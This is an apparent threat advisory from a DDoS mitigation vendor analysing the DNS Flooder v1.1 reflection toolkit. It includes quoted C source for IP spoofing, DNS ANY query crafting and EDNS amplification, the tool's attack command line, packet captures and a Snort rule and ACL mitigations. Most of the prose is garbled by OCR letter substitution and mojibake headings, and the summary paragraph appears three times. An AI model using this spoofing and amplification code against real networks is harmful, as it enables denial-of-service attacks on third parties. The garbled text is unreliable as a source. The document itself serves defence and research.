The document summarizes the capabilities and techniques used by a new DNS reflection tool called DNS Flooder v1.1 that can be used to conduct large-scale DDoS attacks. It analyzes the source code to outline key functions, such as spoofing the source IP address, crafting DNS requests to elicit amplified responses over 4,000 bytes in size, and distributing requests over the network from infected resolvers. The tool effectively hides the real source of requests while multiplying attack traffic targeting victims.
The document summarizes the capabilities and techniques used by a new DNS reflection tool called DNS Flooder v1.1 that can be used to conduct large-scale DDoS attacks. It analyzes the source code to outline key functions, such as spoofing the source IP address, crafting DNS requests to elicit amplified responses over 4,000 bytes in size, and distributing requests over the network from infected resolvers. The tool effectively hides the real source of requests while multiplying attack traffic targeting victims.
The document summarizes the capabilities and techniques used by a new DNS reflection tool called DNS Flooder v1.1 that can be used to conduct large-scale DDoS attacks. It analyzes the source code to outline key functions, such as spoofing the source IP address, crafting DNS requests to elicit amplified responses over 4,000 bytes in size, and distributing requests over the network from infected resolvers. The tool effectively hides the real source of requests while multiplying attack traffic targeting victims.
01231/24 LxSerL has observed Lhe release and rapld deploymenL of a new unS reflecLlon LoolklL for dlsLrlbuLed denlal of servlce (uuoS) aLLacks. 1he name of Lhls uuoS LoolklL ls unS llooder v1.1. lL was flrsL leaked on popular hackforums and has been used agalnsL rolexlc cusLomers. 1hls LoolklL conLalns a new, popular meLhod of crafLlng large unS resource records.
1hls new meLhod allows mallclous acLors Lo ampllfy responses by a facLor of 30 or more per requesL. Mallclous acLors cusLomlze Lhelr own unS resource records, addlng words and commenLs LhaL may explaln Lhelr parLlcular aLLack campalgn. 1hls meLhod expedlLes Lhe avallablllLy of Lhe unS boLneL for use and proflL ln Lhe uuoS-for-hlre markeL.
1hls LhreaL advlsory ouLllnes a serles of lndlcaLors, lncludlng a full analysls of Lhe source code, LoolklL funcLlons, mallclous payloads and recommended mlLlgaLlon Lechnlques for Lhe unS llooder v1.1 uuoS LoolklL. /"!/56703# 0% !"# %800!23 1hls LacLlc generaLes resource records LhaL conLaln large responses (more Lhan 4,000 byLes) when querled wlLh an An? (233) requesL from Lhe spoofed l address. 1he responses Lo Lhese An? requesLs resulL ln ampllfled aLLack payloads. 1he Lechnlque baslcally crafLs requesLs wlLh record Lype An?, whlch Lhen wlll ellclL responses LhaL are larger ln slze and dlrecLed aL Lhe LargeLed vlcLlms.
1hese ellclLed responses mlghL look slmllar Lo Lhe known lsc.org aLLack, whlch uses unSsec parameLers Lo ampllfy responses, buL Lhey are noL.
1hls Lechnlque sLlll uLlllzes reflecLors, whlch allows Lhe aLLacker Lo boLh spoof Lhe lnlLlal requesLs and ampllfy Lhe response. 8y uslng reflecLors, Lhe aLLacker ls able Lo mulLlply Lhe aLLack Lrafflc Lo Lhe LargeL and hlde Lhe Lrue source of requesLs.
2
%9:;*) ,< 7=) &)>?)( !"# %&''()* +,-, @''&?9@ #0A352 50!2 6"68B#/# LxSerL performed an analysls of Lhe source code of Lhe unS llooder v1.1 Lool. A seL of key funcLlonallLles of Lhls Lool are ouLllned ln order Lo undersLand lLs crlLlcal feaLures and capablllLles. #C''D9E: F9@= @=) /G =)>()*H 1he unS llooder LoolklL aLLempLs Lo spoof Lhe source l address of Lhe An? requesL for Lhe unS reflecLlon aLLack. 1hls works by manually consLrucLlng Lhe l header sLrucLure. 1he llne lph->saddr = lneL_addr(192.168.3.100"), supplles Lhe l header wlLh a flxed source address of 192.168.3.100, whlch wlll reach Lhe unS server as belng Lhe source of Lhe requesL. 1hls Lechnlque ls Lyplcally used Lo proLecL Lhe aLLacker from belng Lraced.
3 5*>D@9E: @=) !"# 3)K;)H@ 1hls porLlon of code wlll manually crafL a unS 8equesL header. lL ls observed LhaL Lhe LoolklL uses unS proLocol speclflcaLlons (8lC 1033) wlLhln lLs parameLers. 1he !" fleld ls randomly generaLed uslng Lhe auLhor's own random number generaLor funcLlon called rand_cmwc(). 1he #$ fleld ls seL Lo 0, Lhls speclfles LhaL lL wlll be a requesL. 1he $" fleld ls seL Lo 1, Lhls speclfles LhaL recurslon ls deslred. AnoLher lmporLanL fleld Lo noLe ls Lhe add_counL fleld. 1hls add_counL fleld ls seL Lo 1 Lo speclfy Lhere wlll be one %""!&!'()* ,-.'$"/ secLlon ln Lhe unS 8equesL packeL.
struct DNS_HEADER *dns = (struct DNS_HEADER *) &strPacket[iPayloadSize]; dns->id = (unsigned short) htons(rand_cmwc()); dns->qr = 0; //This is a query dns->opcode = 0; //This is a standard query dns->aa = 0; //Not Authoritative dns->tc = 0; //This message is not truncated dns->rd = 1; //Recursion Desired dns->ra = 0; //Recursion not available! hey we dont have it (lol) dns->z = 0; dns->ad = 0; dns->cd = 0; dns->rcode = 0; dns->q_count = htons(1); //we have only 1 question dns->ans_count = 0; dns->auth_count = 0; dns->add_count = htons(1); //One additional record %9:;*) L< 7=) 3%5 ,MLN D9)&(H 9OC&)O)E@)( 9E !"# %&''()* Cnce Lhe unS header ls complled, Lhe query requesL ls crafLed. llrsL, lL grabs Lhe domaln name conLalned ln Lhe llnked llsL sLrucLure exLracLed from a conflgurable LexL flle.
//get the domain name and fix formatting strcpy(strDomain, list_node->domain); ChangetoDnsNameFormat(qname, strDomain); %9:;*) P< !"# ('O>9E E>O) D'*O>@@9E: 1hen Lhe LoolklL populaLes Lhe q1ype and qClass of Lhe unS 8equesL flelds. 1he q1ype ls glven Lhe value of 233 or 0xll, whlch LranslaLes Lo an An? requesL. 1he qClass ls glven Lhe value 1, whlch represenLs lnLerneL addresses per 8lC 1033.
4 Cnce LhaL lnformaLlon has been supplled, Lhe l and uu header lnformaLlon ls compleLed by updaLlng Lhe slze and checksum flelds. 1he LoolklL auLhor commenLed Lhe code for clarlLy.
//update size of the udp packet udph->len= htons((iPayloadSize + iAdditionalSize) - sizeof(struct iphdr)); //update the size of the entire packet in the IP header iph->tot_len = iPayloadSize + iAdditionalSize; //radonmize the source port each time udph->source = htons(rand_cmwc() & 0xFFFF); //calculate the checksum iph->check = csum ((unsigned short *) strPacket, iph->tot_len >> 1); %9:;*) R< G>J?)@ =)>()* J'ED9:;*>@9'E AnoLher lmporLanL feaLure of unS llooder ls lLs ablllLy Lo send a requesL LhaL wlll ensure Lhe largesL posslble response from Lhe server. lL does Lhls by lncludlng an AddlLlonal 8ecord secLlon Lo enforce LunS (LxLended unS) and seL Lhe slze of Lhe uu payload response Lo 9,000 byLes (0x2328). 1hls allows Lhe unS server Lo send a large response Lo Lhe vlcLlm wlLhouL LruncaLlon or reLransmlsslons. 1he code for Lhls funcLlon ls shown ln llgure 7.
iAdditionalSize += 11; %9:;*) S< 6((9@9'E>& 3)J'*(H J*)>@9'E Cnce Lhls sLep ls compleLed, Lhe LoolklL wlll loop Lhe unS requesL 13 Llmes, sendlng lL ln a Lhread funcLlon. 1hls occurs for each unS server LhaL ls deflned ln Lhe conflgurable LexL flle and ls passed as an argumenL Lo Lhe LoolklL.
5 1he source code for unS llooder v1.1 reveals some common Lechnlques for l spooflng and uLlllzlng raw sockeLs ln order Lo crafL Lhe uu payload by hand. 1he auLhor carefully crafLs a unS requesL LhaL uses nuances of Lhe unS proLocol Lo ampllfy response packeLs wlLh full anonymlLy. lL ls also worLh noLlng LhaL, because Lhls Lool uLlllzes raw sockeLs, lL can only be run wlLh rooL prlvlleges. lurLhermore, lL's evldenL Lhe source code was noL deslgned Lo be complled under 8Su-flavored Llnux envlronmenLs (lncludlng Mac CSx's uarwln). lL wlll fall Lo complle ln Lhese envlronmenLs due Lo lncompaLlblllLles ln Lhe deflnlLlons of Lhe l and LransporL proLocol flelds ln Lhe source header flles. 7''&?9@ )V)J;@9'E< W;)*Q >E( C>Q&'>( Cnce Lhe LoolklL has been complled, Lhe mallclous acLor wlll execuLe lL. 8y uLlllzlng Lhe approprlaLe command llne argumenLs, Lhe aLLacker can begln produclng spoofed unS querles Lo LargeL vlcLlms. A sample query ls shown ln llgure 9.
6 llgure 10 shows Lhe execuLlon of Lhe payload. noLlce LhaL Lhe reply from Lhe vlcLlm servers exceeds 4,000 byLes and creaLes subsequenL fragmenLaLlon. 1hls ls a resulL of unS servers ampllfylng Lhe query response.
Payload was split into 3 fragments 192.168.20.16 = DNS server used to amplify query response 192.168.20.50 = Target
Code snippet fragment 1: 19:05:53.826828 IP (tos 0x0, ttl 64, id 47098, offset 0, flags [+], proto UDP (17), length 1500) 192.168.20.16.53 > 192.168.20.50.16034: 28384| 251/0/1 x.x.x.x.com. TXT "Jvvcxjoijcxoivjoixcjiojdiw9jd9wj9jf9w9wj9", x.x.x.x.com. A 192.168.50.241, x.x.x.x.com. A 192.168.50.242, x.x.x.x.com. A 192.168.50.243, x.x.x.x.com. A 192.168.50.244, x.x.x.x.com. A 192.168.50.245, x.x.x.x.com. A 192.168.50.246, x.x.x.x.com. A 192.168.50.247, x.x.x.x.com. A 192.168.50.248, x.x.x.x.com. A 192.168.50.249, x.x.x.x.com. A 192.168.20.10, x.x.x.x.com. A 192.168.50.1, x.x.x.x.com. A 192.168.50.2, x.x.x.x.com. A 192.168.50.3, x.x.x.x.com. A 192.168.50.4, x.x.x.x.com. A 192.168.50.5, x.x.x.x.com. A 192.168.50.6, x.x.x.x.com. A 192.168.50.7, x.x.x.x.com. A 192.168.50.8, x.x.x.x.com. A 192.168.50.9, x.x.x.x.com. A 192.168.50.10, x.x.x.x.com. A 192.168.50.11, x.x.x.x.com. A 192.168.50.12, x.x.x.x.com. A 192.168.50.13, x.x.x.x.com. A 192.168.50.14, x.x.x.x.com. A 192.168.50.15, x.x.x.x.com. A 192.168.50.16, x.x.x.x.com. A 1192.168.50.45, x.x.x.x.com. A 192.168.50.46, x.x.x.x.com. A 192.168.50.47, x.x.x.x.com. A 192.168.50.48, x.x.x.x.com. A 192.168.50.49, x.x.x.x.com. A 192.168.50.70, x.x.x.x.com. A 192.168.50.71, x.x.x.x.com. A 192.168.50.72, x.x.x.x.com. A 192.168.50.73, x.x.x.x.com. A 192.168.50.74, x.x.x.x.com. A 192.168.50.75, x.x.x.x.com. A 192.168.50.76, x.x.x.x.com. A 192.168.50.77[|domain] E..... .@..........2.5>....Wn............x.x.x.x.com............ :..*)Jvvcxjoijcxoivjoixcjiojdiw9jd9wj9jf9w9wj9
Code snippet fragment 2: 19:05:53.827139 IP (tos 0x0, ttl 64, id 47098, offset 1480, flags [+], proto UDP (17), length 1500) 192.168.20.16 > 192.168.20.50: ip-proto-17 E..... .@..........2....... :.....2N....... :.....2O....... :.....2P.......
Code snippet fragment 3: 19:05:53.827148 IP (tos 0x0, ttl 64, id 47098, offset 2960, flags [none], proto UDP (17), length 1159) 192.168.20.16 > 192.168.20.50: ip-proto-17 E......r@..g.......2:.....2........ :.....2........ :.....2........ %9:;*) ,M< #>OC&) C>Q&'>( )V)J;@9'E 8unnlng Lhe LoolklL requlres a few command llne argumenLs Lo be passed. 1he command llne formaL and opLlons are explalned below.
sudo ./dnsflood [target_ip] [53] [reflectlist.txt] [1] [1] @>*:)@Y9C: 1he l address of Lhe lnLended LargeL of Lhe reflecLlon aLLack NL< 1he porL used ln Lhe aLLack. 1hls ls hardcoded Lo porL 33 ln Lhe source code. *)D&)J@&9H@-@V@< 1he llsL of unS servers whlch wlll recelve Lhe requesLs. 1he crafLed requesL lncludes Lhe spoofed l address of Lhe LargeL. 1he unS servers wlll reflecL Lhe responses Lo Lhe LargeL. , ,< 1he flrsL number deflnes Lhe quanLlLy of Lhreads. 1he second number deflnes Lhe duraLlon of Lhe LoolklL execuLlon (ln seconds).
As a resulL, Lhls command wlll execuLe unS An? querles agalnsL a LargeL l address uslng Lhe deslgnaLed reflecLlon llsL (Lhe unS servers seL up by Lhe mallclous acLors), uLlllzlng a speclfled number of Lhreads (1) and duraLlon ln seconds (1). 1hls wlll produce an ampllfled reflecLed response aL a raLlo of 1:30, lnLended Lo consume LargeL resources.
7 Z68/5/0A# 65703 6773/[A7/0" llgure 11 shows a snlppeL of Lhe Al code pulled from a server LhaL was belng used ln a booLer lnfrasLrucLure. Pere Lhe LoolklL has been renamed from unS llooder v1.1 Lo 012, llkely because of lLs ablllLy Lo produce 30x ampllflcaLlon.
%9:;*) ,,< 6G/ J'() 'D > U''@)* 9ED*>H@*;J@;*) ;H9E: > *)E>O)( !"# %&''()* @''& uynamlcally execuLlng 012 reveals LhaL lL ls lndeed unS llooder v1.1.
%9:;*) ,I< 2V)J;@9'E 'D !"# %&''()* +,-, @=*';:= !"# 6G/ 86[ #7A!B unS llooder v1.1 was analyzed ln LxserL's lab envlronmenL Lo deLermlne lLs characLerlsLlcs. A few Lechnlcal feaLures were observed.
llrsL, when run wlLh one Lhread agalnsL mulLlple desLlnaLlons:
8 When run wlLh mulLlple Lhreads agalnsL mulLlple desLlnaLlons:
%9:;*) ,P< !"# %&''()* +,-, >@@>J? HJ*9C@ F9@= @=*)>(H >*:;O)E@ H)@ @' ,M- 7)E (9DD)*)E@ K;)*Q /!H F)*) 'UH)*+)(- 1he flndlngs were lnLeresLlng. AfLer analyzlng Lhe source code and Lhe packeL daLa, lL can be observed LhaL each Lhread has a sLaLlc query lu assoclaLed wlLh lL. 1hls allows us Lo analyze Lhe query lus from Lhe reflecLed response Lrafflc (prlmary LargeL Lrafflc) and deLermlne how many unlque Lhreads were used ln Lhe aLLack lLself.
LxecuLlng Lhe followlng Lshark sLaLemenL agalnsL a pcap from Lhe prlmary LargeL reveals Lhe number of Lhreads launched by Lhe mallclous acLor.
for l ln `flnd ./ | grep '.pcap$'`, do Lshark -nnr $l -8 'udp.srcporL == 33' -o column.formaL:'"unSlu","Cus:dns.ld"' ,done | sorL -n | unlq -c
for i in `find ./ | grep 'dnsreflect-4155_byte_response.pcap$'`; do tshark -nnr $i -2 -R 'udp.srcport == 53' -o column.format:'"DNSID","%Cus:dns.id"' ;done | sort -n | uniq -c
4396 0x6ee0 Where 0x6ee0 is the unique ID and 4396 is the number of instances that match the ID. %9:;*) ,N< 7=) @H=>*? :*)C H@>@)O)E@ 9()E@9D9)( P\XLR ;E9K;) @=*)>(H 3250ZZ2"!2! Z/7/.67/0" !"# %&''()* HE'*@ *;&) alerL udp $Lx1L8nAL_nL1 any -> $PCML_nL1 33 (msg:"unS flooder 1.1 abuse", sld:20130113, rev:1, \ conLenL: "|00 ff 00 01 00 00 29 23 28|", offseL: 12, )
7>*:)@ O9@9:>@9'E ;H9E: 658 )E@*9)H deny udp any eq 33 hosL x.x.x.x gL 1023 deny udp any hosL x.x.x.x fragmenLs
9 0[#2312! 56ZG6/."# 1he unS llooder v1.1 LoolklL has been observed belng used ln mulLlple campalgns durlng C3 and C4 2013. 1hls secLlon wlll dlscuss Lwo examples of unS llooder v1.1 uuoS aLLacks agalnsL rolexlc's cusLomers. 6@@>J? 6 Cne aLLack based on Lhe unS llooder v1.1 LoolklL lasLed approxlmaLely four hours. 1he aLLack sLaLlsLlcs from our scrubblng cenLers are llsLed below.
18:48:52.102410 IP xxx.xxx.xxx.xxx.53 > xxx.xxx.xxx.xxx.7403: 36420 246/2/5 A 5.135.4.1, A 5.135.4.10, A 5.135.4.11, A 5.135.4.12, A 5.135.4.13, A 5.135.4.14, A 5.135.4.15, A 5.135.4.16, A 5.135.4.17, A 5.135.4.18, A 5.135.4.19, A 5.135.4.2, A 5.135.4.20, A 5.135.4.21, A 5.135.4.22, A 5.135.4.23, A 5.135.4.24, A 5.135.4.25, A 5.135.4.26, A 5.135.4.27, A 5.135.4.28, A 5.135.4.29, A 5.135.4.3, A 5.135.4.30, A 5.135.4.4, A 5.135.4.5, A 5.135.4.6, A 5.135.4.7, A 5.135.4.8, A 5.135.4.9, A 5.135.4.31, A 5.135.4.32, A 5.135.4.33, A 5.135.4.34, A 5.135.4.35, A 5.135.4.36, A 5.135.4.37, A 5.135.4.38, A 5.135.4.39, A 5.135.4.40, A 5.135.4.41, A 5.135.4.42, A 5.135.4.43, A 5.135.4.44, A 5.135.4.45, A 5.135.4.46, A 5.135.4.47, A 5.135.4.48, A 5.135.4.49, A 5.135.4.50, A 5.135.4.51, A 5.135.4.52, A 5.135.4.53, A 5.135.4.54, A 5.135.4.55, A 5.135.4.56, A 5.135.4.57, A 5.135.4.58, A 5.135.4.59, A 5.135.4.60, A 5.135.4.61, A 5.135.4.62, A 5.135.4.63, A 5.135.4.64, A 5.135.4.65, A 5.135.4.66, A 5.135.4.67, A 5.135.4.68, A 5.135.4.69, A 5.135.4.70, A 5.135.4.71, A 5.135.4.xxx, A 5.135.4.73, A 5.135.4.74, A 5.135.4.75, A 5.135.4.76, A 5.135.4.77, A 5.135.4.78, A 5.135.4.79, A 5.135.4.80, A 5.135.4.81, A 5.135.4.82, A 5.135.4.83, A 5.135.4.84, A 5.135.4.85, A 5.135.4.86, A 5.135.4.87, A 5.135.4.88, A 5.135.4.89, A 5.135.4.90,[|domain]
18:49:29.888142 IP xxx.xxx.xxx.xxx > xxx.xxx.xxx.xxx: udp ....E..s.LAp..^.@H."H4..[n..............[n..............[n..............[n..............[n. .............[n..............[n..............[n..............[n..............[n............ ..[n..............[n..............[n..............[n..............[n..............[n....... .......[n..............[n..............[n..............[n..............[n..............[n.. ............[n..............[n..............[n..............[n..............[n............. .[n..............[n..............[n..............[n..............[n..............[n........ ......[n..............[n..............[n..............[n..............[n..............[n... ...........[n..............[n..............[n..............[n..............[n.............. [n..............[n..............[n..............[n..............[n..............[n......... .....[n..............[n..............[n..............[n..............[n..............[n.... ..........[n..............[n..............[n..............[n..............[n..............[ n..............[n..............[n..............[n..............[n..............[n...ns2.).. ......[n...%........[n...%........[n......)........ 18:49:29.994978 IP xxx.xxx.xxx.xxx > xxx.xxx.xxx.xxx: udp ....E..c.N.r;.[..>Y)H4...P...............P...............P...............P...............P. ..............P...............P...............P...............P...............P............ ...P...............P...............P...............P...............P...............P....... ........P...............P...............P...............P...............P...............P.. .............P...............P...............P...............P...............P............. ..P...............P..... .........P..... .........P...............P...............P...............P...............P...............P. ..............P...............P...............P...............P...............P............ ...P...............P...............P...............P...............P...............P....... ........P...............P..... .........P.....!.........P.....".........P.....#.........P.....$.........P.....%.........P. 10 ....&.........P.....'.........P.....(.........P.....).........P.....*.........P.....+...... ...P.....,.........P.....-.........Q...ns2.).........Q...%.........Q...%.........Q......). %9:;*) ,S< 6@@>J? H9:E>@;*) ;H)( 9E @=) !"# %&''()* J>OC>9:EH Cne of Lhe sLeps Laken by mallclous acLors prlor Lo Lhe use of Lhls Lool was Lhe seLup of unS servers LhaL wlll respond and ampllfy Lhe aLLackers' unS querles. 1hls sLep ensures Lhe responses wlll be dlrecLed Lo Lhe lnLended LargeL. All aLLack Lrafflc was successfully mlLlgaLed by rolexlc. 6@@>J? [ 1he second example was ldenLlfled by lLs use of resource records LhaL conLalned large responses of more Lhan 4,000 byLes when querled wlLh an An? (233) requesL.
San !ose London Pong kong WashlngLon G)>? U9@H C)* H)J'E( ]UCH^ 433.17 Mbps 2.19 Cbps 1.09 Cbps 1.26 Cbps G)>? C>J?)@H C)* H)J'E( ]CCH^ 43.13 kpps 208.86 kpps 106.03 kpps 118.33 kpps %9:;*) ,T< G)>? +>&;)H J'OC9&)( UQ @=) G*'&)V9J HJ*;UU9E: J)E@)*H D'* @=) H)J'E( J>OC>9:E 1hls unS llooder LoolklL can produce slgnlflcanL bandwldLh power wlLh only a few servers. lor example, 1 Cbps of aLLack bandwldLh could yleld 30 Cbps of reflecLed aLLack Lrafflc. ln boLh campalgns menLloned ln Lhls documenL, false unS resource records were used Lo ampllfy responses. 1he LoolklL hldes lLs l address by spooflng Lhe unS requesL as orlglnaLlng from Lhe LargeL. CrafLlng Lhe unS resource record requlres rooL or sysLem level access Lo Lhe boLneL servers and compllcaLes plnpolnLlng Lhe orlgln of Lhe aLLack. 1hls allows mallclous acLors Lo use Lhelr own aLLack resources for performlng unS reflecLlon floods and lends lLself Lo be a forceful Lool ln uuoS-for-hlre scenarlos.
LxserL wlll conLlnue analyzlng Lhls uuoS LoolklL Lo lnclude posslble upcomlng varlaLlons, and lssue new LhreaL advlsorles should lL be warranLed.
11 50"73/[A703# LxserL 6[0A7 7_2 G3082`/5 #25A3/7B 2"./"223/". 6"! 32#G0"#2 726Z ]G8`H)*@^ LxserL monlLors mallclous cyber LhreaLs globally and analyzes uuoS aLLacks uslng proprleLary Lechnlques and equlpmenL. 1hrough dlglLal forenslcs and posL-aLLack analysls, LxserL ls able Lo bulld a global vlew of uuoS aLLacks, whlch ls shared wlLh cusLomers and Lhe securlLy communlLy. 8y ldenLlfylng Lhe sources and assoclaLed aLLrlbuLes of lndlvldual aLLacks, Lhe LxserL Leam helps organlzaLlons adopL besL pracLlces and make more lnformed, proacLlve declslons abouL uuoS LhreaLs. 6[0A7 G3082`/5 rolexlc ls Lhe world's largesL, mosL LrusLed ulsLrlbuLed uenlal of Servlce (uuoS) mlLlgaLlon provlder. Able Lo absorb Lhe largesL and mosL complex aLLacks ever launched, rolexlc resLores mlsslon-crlLlcal lnLerneL-faclng lnfrasLrucLures for global enLerprlses and governmenL agencles wlLhln mlnuLes. 1en of Lhe world's largesL banks and Lhe leadlng companles ln e-Commerce, SaaS, paymenL processlng, energy, Lravel/hosplLallLy, gamlng and oLher aL-rlsk lndusLrles rely on rolexlc Lo proLecL Lhelr buslnesses. lounded ln 2003 as Lhe world's flrsL ln-Lhe-cloud uuoS mlLlgaLlon plaLform, rolexlc ls headquarLered ln lorL Lauderdale, llorlda and has scrubblng cenLers locaLed ln Lhe Amerlcas, Lurope and Asla. 1o learn more abouL how rolexlc can sLop uuoS aLLacks and proLecL your buslness, please vlslL www.prolexlc.com, follow us on Llnkedln, lacebook, Coogle+, ?ou1ube3 and [rolexlc on 1wlLLer.
12 6!!2"!AZ< %A88 #0A352 50!2 0% !"# %800!23 1hls source code ls avallable aL hLLps://glLhub.com/plxserLr/dnsreflecL for research purposes.
struct list { struct sockaddr_in data; char domain[512]; int line; struct list *next; struct list *prev; }; struct list *head;
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; int port; };
struct DNS_HEADER { unsigned short id; // identification number
unsigned char rd :1; // recursion desired unsigned char tc :1; // truncated message unsigned char aa :1; // authoritive answer unsigned char opcode :4; // purpose of message unsigned char qr :1; // query/response flag
unsigned char rcode :4; // response code unsigned char cd :1; // checking disabled unsigned char ad :1; // authenticated data unsigned char z :1; // its z! reserved unsigned char ra :1; // recursion available
unsigned short q_count; // number of question entries unsigned short ans_count; // number of answer entries unsigned short auth_count; // number of authority entries unsigned short add_count; // number of resource entries }; 13
//Constant sized fields of query structure struct QUESTION { unsigned short qtype; unsigned short qclass; };
//Constant sized fields of the resource record structure struct QUERY { unsigned char *name; struct QUESTION *ques; };
for (i = 3; i < 4096; i++) Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
uint32_t rand_cmwc(void) { uint64_t t, a = 18782LL; static uint32_t i = 4095; uint32_t x, r = 0xffe; i = (i + 1) & 4095; t = a * Q[i] + c; c = (t >> 32); x = t + c; if (x < c) { x++; c++; } return (Q[i] = r - x); }
14 /* function for header checksums */ unsigned short csum (unsigned short *buf, int nwords) { unsigned long sum; for (sum = 0; nwords > 0; nwords--) sum += *buf++; sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); return (unsigned short)(~sum); }